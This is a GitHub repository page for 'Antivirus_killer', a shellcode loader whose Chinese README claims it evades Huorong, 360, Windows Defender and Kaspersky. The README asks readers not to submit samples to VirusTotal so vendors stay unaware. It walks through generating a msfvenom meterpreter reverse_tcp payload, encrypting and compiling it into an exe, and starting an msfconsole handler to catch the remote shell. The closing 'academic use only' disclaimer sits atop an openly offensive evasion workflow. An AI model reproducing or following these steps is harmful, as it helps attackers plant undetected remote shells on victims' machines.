Skip to content

paokuwansui/Antivirus_killer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

37 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Antivirus_killer

免杀主流防病毒软件
测试于2025年5月27日加载器2025_5_27(需配合新版加密器)可过最新版火绒、360核晶模式、windows自带杀软、卡巴斯基
微步云沙箱0/24,VT 6/73,麻烦大家少跑VT,VT会给病毒厂商同步报告,且用且珍惜
该项目仅供学术交流参考,请大家合法学习和使用项目

使用方法

生成shellcode

msfvenom LHOST=x.x.x.x LPORT=443 -p windows/x64/meterpreter/reverse_tcp -f c

加密shellcode

将生成的shellcode复制到加密器.c的buf变量中并编译运行

编译加载器

将加密后的shellcode 复制到加载器的shellcode变量中编译 PS:编译出来的可执行程序名称应该和程序中第7行的防护一至

准备msf监听器

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
run

双击编译好的exe观察是否上线

image image image

About

免杀主流防病毒软件

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages